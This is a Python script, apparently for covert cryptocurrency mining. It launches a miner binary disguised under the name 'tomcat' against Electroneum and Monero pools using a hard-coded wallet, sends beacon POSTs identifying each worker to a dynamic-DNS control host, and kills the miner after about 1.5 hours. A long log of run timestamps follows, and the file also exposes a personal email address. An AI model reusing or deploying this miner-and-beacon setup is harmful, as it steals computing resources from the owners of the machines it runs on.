import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:35:04.541149
#2018-02-17 16:21:01.896984
#2018-02-17 18:08:06.258394
#2018-02-17 19:55:08.488952
#2018-02-17 21:42:07.247684
#2018-02-17 23:26:01.908913
#2018-02-18 01:16:01.534892
#2018-02-18 03:03:05.250466
#2018-02-18 04:51:01.893120
#2018-02-18 06:41:05.578132
#2018-02-18 08:30:08.221058
#2018-02-18 10:18:02.064927
#2018-02-18 12:04:05.526980
#2018-02-18 13:49:03.455082
#2018-02-18 15:39:07.491701
#2018-02-18 17:29:05.610545
#2018-02-18 19:17:01.548312
#2018-02-18 21:03:06.395626
#2018-02-18 22:49:06.716171
#2018-02-19 00:38:03.592180
#2018-02-19 02:24:04.496107
#2018-02-19 04:11:02.199102
#2018-02-19 05:55:06.102408
#2018-02-19 07:44:04.455540
#2018-02-19 09:33:01.508794
#2018-02-19 11:23:09.178393
#2018-02-19 13:10:10.950581
#2018-02-19 14:58:09.629333
#2018-02-19 16:46:09.478603
#2018-02-19 18:32:08.166167
#2018-02-19 20:18:06.952673
#2018-02-19 22:07:01.281077
#2018-02-19 23:52:07.098839
#2018-02-20 01:39:05.638526
#2018-02-20 03:27:07.312018
#2018-02-20 05:14:06.068016
#2018-02-20 06:56:07.200463
#2018-02-20 08:44:07.099627
#2018-02-20 10:28:08.584332
#2018-02-20 12:13:04.614479
#2018-02-20 14:00:09.763211
#2018-02-20 15:44:07.865167
#2018-02-20 17:29:07.221771
#2018-02-20 19:18:09.969061
#2018-02-20 21:08:06.225467
#2018-02-20 22:52:05.714418
#2018-02-21 00:36:05.483243
#2018-02-21 02:24:01.974264
#2018-02-21 04:10:07.078451
#2018-02-21 05:57:04.687547
#2018-02-21 07:46:04.062301
#2018-02-21 09:32:08.095921
#2018-02-21 11:20:01.632453
#2018-02-21 13:08:07.240791
#2018-02-21 14:54:06.165618
#2018-02-21 16:44:06.082201
#2018-02-21 18:39:01.243228
#2018-02-21 20:24:02.072469
#2018-02-21 22:11:02.039351
#2018-02-21 23:59:06.264190
#2018-02-22 01:47:01.290807
#2018-02-22 03:35:04.390913
#2018-02-22 05:21:05.230314
#2018-02-22 07:05:06.705246
#2018-02-22 08:51:07.817661
#2018-02-22 10:38:09.244305
#2018-02-22 12:26:06.047217
#2018-02-22 14:11:07.471922
#2018-02-22 15:57:10.038241
#2018-02-22 17:43:08.406239
#2018-02-22 19:29:06.006674
#2018-02-22 21:21:01.566005
#2018-02-22 23:06:06.455659
#2018-02-23 00:52:04.438862
#2018-02-23 02:41:04.200969
#2018-02-23 04:28:07.438585
#2018-02-23 06:13:07.550712
#2018-02-23 07:59:06.130321
#2018-02-23 10:16:05.754720
#2018-02-23 12:06:08.437357
#2018-02-23 13:55:03.218621
#2018-02-23 15:46:08.660590
#2018-02-23 17:32:06.231142
#2018-02-23 19:18:07.945975
#2018-02-23 21:02:08.874012
#2018-02-23 22:49:07.369613
#2018-02-24 00:37:04.401263
#2018-02-24 02:27:06.108255
#2018-02-24 04:18:04.910878
#2018-02-24 06:06:04.334795
#2018-02-24 07:53:06.637572
#2018-02-24 09:39:05.622503
#2018-02-24 11:34:05.759432
#2018-02-24 13:24:07.113511
#2018-02-24 15:13:06.709878
#2018-02-24 17:02:03.917241
#2018-02-24 18:51:03.655141
#2018-02-24 20:41:03.536596
#2018-02-24 22:49:07.283768
#2018-02-25 02:10:04.060848
#2018-02-25 05:49:07.030784
#2018-02-25 11:37:04.279394